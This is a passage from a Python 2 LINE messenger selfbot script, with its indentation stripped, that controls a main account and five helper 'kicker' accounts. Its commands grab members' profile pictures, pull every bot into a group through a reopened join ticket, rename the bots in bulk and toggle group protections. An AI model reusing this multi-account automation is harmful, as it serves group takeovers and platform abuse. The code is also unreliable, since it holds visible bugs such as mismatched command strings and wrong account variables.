elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#--------------------------------------------------
# elif msg.text.lower() == 'help2':
# if wait["lang"] == "JP":
cl.sendText(msg.to,help2Message)
# else:
# cl.sendText(msg.to,help2Message)
#----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
elif "M @" in msg.text:
_name = msg.text.replace("M @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#----------------------------------------------------------
elif msg.text in ["group","รายชื่อ"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[★] %s\n" % (cl.getGroup(i).name +"→["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"▒▒▓█[List Group]█▓▒▒\n"+ h +"Total Group =" +"["+str(len(gid))+"]")
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Mybot" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
# if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['detectMention'] == True:
# contact = kr.getContact(msg.from_)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cName = contact.displayName
# msg.text1 = "@"+cName+" "
# balas = ["💓อย่าแท้กสิเตง💓"]
# ret_ = msg.text1 + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# kr.sendText(msg.to,ret_)
# kr.sendImageWithURL(msg.to,image)
# break
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------------
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟เปิดอ่านคอนแทคสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"🌟ปิดอ่านคอนแทคสำเร็จ🌟")
elif msg.text.lower() == 'protect on':
if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ��")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิดสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค���ตเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"��ล็อคการเชิญกลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if msg.from_ in admin:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญสมาชิกเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait['detectMention'] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait['detectMention'] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["on"]:
wait['group'] = True
cl.sendText(msg.to,"เปิดต้อนรับแร้ว")
elif msg.text in ["off"]:
wait['group'] = False
cl.sendText(msg.to,"ปิดข้อความ")
elif msg.text in ["Sambutan on"]:
if wait["Sambutan"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
else:
wait["Sambutan"] = True
wait["joinkick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Sambutan off"]:
if wait["Sambutan"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
else:
wait["Sambutan"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
elif msg.text.lower() == 'join on':
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ออโต้เข้ากลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์���ค้ต���ิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้���คิวอาร์โค้ต���ิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร���โค้ต���ิด✨")
elif msg.text.lower() == 'join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด���")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
elif msg.text in ["Inviteprotect off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomesg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ คอนแทค → ✔\n"
else: md+="🔚 คอนแทค → ❎\n"
if wait["autoJoin"] == True: md+="☞ ออโต้เข้ากลุ่ม → ✔\n"
else: md+="🔚 ออโต้เข้ากลุ่ม → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ ยกเลิกเชิญกลุ่ม: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 ยกเลิกเชิญกลุ่ม → ❎\n"
if wait["leaveRoom"] == True: md+="☞ ออโต้ออกแชทรวม → ✔\n"
else: md+="🔚 ออโต้ออกแชทรวม → ❎\n"
if wait["timeline"] == True: md+="☞ แชร์ลิ้ง → ✔\n"
else:md+="🔚 แชร์ลิ้ง → ❎\n"
if wait["autoAdd"] == True: md+="☞ ออโต้แอด → ✔\n"
else:md+="🔚 ออโต้แอด → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ ป้องกัน → ✔\n"
else:md+="🔚 ป้องกัน → ❎\n"
if wait["linkprotect"] == True: md+="☞ ป้องกันลิ้ง → ✔\n"
else:md+="🔚 ป้องกันลิ้ง → ❎\n"
if wait["inviteprotect"] == True: md+="☞ ป้องกันเขิญ → ✔\n"
else:md+="🔚 ป้องกันเชิญ → ❎\n"
if wait["cancelprotect"] == True: md+="☞ ป้องกันยกเลิกเชิญ → ✔\n"
else:md+="🔚 ป้องกันยกเลิกเชิญ → ❎\n"
if wait["likeOn"] == True: md+="☞ ออโต้ไลค์ → ✔\n"
else:md+="🔚 ออโต้ไลค์ → ❎\n"
if wait["group"] == True: md+="☞ เปิดข้อความต้อนรับ → ✔\n"
else:md+="🔚 เปิดข้อความต้อนรับ → ❎\n"
if wait["Sambutan"] == True: md+="☞ เปิดโชว์คอนแทค → ✔\n"
else:md+="🔚 เปิดโชว์คอนแทค → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["Like on"] = True
if wait["likeOn"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Like off"]:
if wait["likeOff"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOff"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
